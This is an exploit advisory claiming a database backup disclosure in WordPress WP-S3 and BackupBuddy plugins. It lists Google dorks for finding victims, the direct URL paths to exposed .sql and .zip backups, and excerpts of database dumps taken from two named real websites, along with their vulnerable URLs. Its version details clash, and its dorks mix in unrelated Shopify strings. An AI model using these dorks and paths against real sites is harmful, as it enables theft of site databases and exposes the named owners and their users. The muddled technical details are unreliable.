WordPress Ithemes-BackupBuddy Amazon WP-S3 plugin version 2.9 suffers from a database disclosure vulnerability.
776ea1da0e8e3b190a85600d0d9a6783904a097c343499e68a6207fadc499a14
#################################################################################################
# Exploit Title : WordPress Ithemes-BackupBuddy Amazon WP-S3 Plugins 2.9
Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 17/12/2018
# Vendor Homepage : ithemes.com/purchase/backupbuddy/ ~
wordpress.org/plugins/wp-s3/
# Software Download Link : downloads.wordpress.org/plugin/wp-s3.1.5.zip
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : WP-S3 1.5 Version - Ithemes-BackupBuddy 2.9 Version
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/uploads/wp-s3-database-backup.sql''
+ intext:''Powered by Shopify''
+ intext:A(c) 2018, Holy Sparks Jewish Art & Books For Spiritual & Personal
Development Powered by Shopify''
+ intext:''2015 A(c) ALL RIGHTS RESERVED BY THE-SCHMIDT''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
WordPress Amazon S3 Plugin 1.5 and WordPress Ithemes-BackupBuddy 2.9
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit :
/wp-content/uploads/wp-s3-database-backup.sql
/wp-content/uploads/wp-s3-backups.zip
#################################################################################################
# Example SQL Dump Some Informations and Tables Names => holysparks.org
-- MySQL dump 10.13 Distrib 5.1.58, for unknown-linux-gnu (x86_64)
--
-- Host: localhost Database: raeshaga_wrd1
-- ------------------------------------------------------
-- Server version 5.1.58-community-log
-- Table structure for table `wp_StreamPad_Tracks`
-- Dumping data for table `wp_StreamPad_Tracks`
-- Table structure for table `wp_affiliates_banners_tbl`
-- Dumping data for table `wp_affiliates_banners_tbl`
-- Table structure for table `wp_affiliates_clickthroughs_tbl`
-- Dumping data for table `wp_affiliates_clickthroughs_tbl`
-- Table structure for table `wp_affiliates_leads_tbl`
-- Dumping data for table `wp_affiliates_leads_tbl`
-- Table structure for table `wp_affiliates_payouts_tbl`
-- Dumping data for table `wp_affiliates_payouts_tbl`
-- Table structure for table `wp_affiliates_sales_tbl`
-- Dumping data for table `wp_affiliates_sales_tbl`
-- Table structure for table `wp_affiliates_tbl`
-- Dumping data for table `wp_affiliates_tbl`
-- Table structure for table `wp_commentmeta`
-- Dumping data for table `wp_commentmeta`
-- Table structure for table `wp_comments`
-- Dumping data for table `wp_comments`
-- Table structure for table `wp_contact_form_7`
-- Dumping data for table `wp_contact_form_7`
-- Table structure for table `wp_ft_wpecards`
-- Dumping data for table `wp_ft_wpecards`
-- Table structure for table `wp_links`
-- Dumping data for table `wp_links`
-- Table structure for table `wp_options`
-- Dumping data for table `wp_options`
-- Dump completed....
################################################################################################
# Example SQL Dump Informations and Tables Names => the-schmidt.com
-- MySQL dump 10.13 Distrib 5.1.60, for unknown-linux-gnu (x86_64)
--
-- Host: localhost Database: theschm1_blog
-- ------------------------------------------------------
-- Server version 5.1.60-community-log
-- Table structure for table `wp_PluginManager`
-- Dumping data for table `wp_PluginManager`
-- Table structure for table `wp_custom_fonts`
-- Dumping data for table `wp_custom_fonts`
-- Table structure for table `wp_cvg_gallery`
-- Dumping data for table `wp_cvg_gallery`
-- Table structure for table `wp_cvg_videos`
-- Dumping data for table `wp_cvg_videos`
-- Table structure for table `wp_download_status`
-- Dumping data for table `wp_download_status`
-- Table structure for table `wp_fancybox`
-- Dumping data for table `wp_fancybox`
-- Table structure for table `wp_item_category_associations`
-- Dumping data for table `wp_item_category_associations`
-- Table structure for table `wp_links`
-- Dumping data for table `wp_links`
-- Table structure for table `wp_ngg_album`
-- Dumping data for table `wp_ngg_album`
-- Table structure for table `wp_ngg_gallery`
-- Dumping data for table `wp_ngg_gallery`
-- Table structure for table `wp_ngg_pictures`
-- Dumping data for table `wp_ngg_pictures`
-- Table structure for table `wp_also_bought_product`
-- Dumping data for table `wp_also_bought_product`
-- Table structure for table `wp_blc_filters`
-- Dumping data for table `wp_blc_filters`
-- Table structure for table `wp_blc_instances`
-- Dumping data for table `wp_blc_instances`
-- Table structure for table `wp_blc_links`
-- Dumping data for table `wp_blc_links`
-- Table structure for table `wp_options`
-- Dumping data for table `wp_options`
-- Dump completed...
#################################################################################################
# Example Vulnerable Sites =>
[+] holysparks.org/wp-content/uploads/wp-s3-database-backup.sql
[+] the-schmidt.com/blog/wp-content/uploads/wp-s3-database-backup.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################